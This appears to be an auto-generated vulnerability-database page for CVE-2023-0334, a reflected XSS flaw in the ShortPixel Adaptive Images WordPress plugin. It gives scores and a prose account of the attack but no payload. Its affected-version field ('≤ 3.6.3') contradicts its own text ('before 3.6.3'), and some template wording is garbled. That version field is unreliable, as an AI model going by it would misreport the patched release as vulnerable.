Cyber Resilience

CVE-2023-0334

MediumPublic PoC

Published: 27 February 2023

Published
27 February 2023
Modified
10 March 2025
KEV Added
Patch
CVSS Score v3.1 6.1 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
EPSS Score 0.0813 92.4th percentile
Risk Priority 17 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2023-0334 is a medium-severity an unspecified weakness vulnerability in Shortpixel Shortpixel Adaptive Images. Its CVSS base score is 6.1 (Medium).

Operationally, ranked in the top 7.6% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

Deeper analysis

The ShortPixel Adaptive Images WordPress plugin before version 3.6.3 contains a reflected cross-site scripting vulnerability. The flaw arises because the plugin fails to sanitize and escape a parameter before reflecting it back into page output, allowing script injection that targets high-privilege users such as administrators. The issue carries a CVSS 3.1 score of 6.1 with network attack vector and required user interaction.

An unauthenticated attacker can exploit the vulnerability by delivering a crafted URL to an administrator or other privileged user. If the victim interacts with the link, the attacker can execute arbitrary JavaScript in the victim's browser session, enabling actions such as session hijacking or unauthorized administrative changes within the WordPress site.

The associated EPSS probability rose from lower values to a recorded peak of 0.2661 before receding to the current score of 0.0813, indicating a period of elevated exploitation interest after public disclosure. The primary reference is the WPScan advisory that documents the reflected XSS condition and the affected plugin versions.

EU & UK References

Vulnerability details

The ShortPixel Adaptive Images WordPress plugin before 3.6.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against any high privilege users such as admin

CWE(s)
None listed

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

shortpixel
shortpixel adaptive images
≤ 3.6.3

Mitigating Controls

No mitigating controls mapped yet. The per-CVE control annotator has not reached this CVE.

References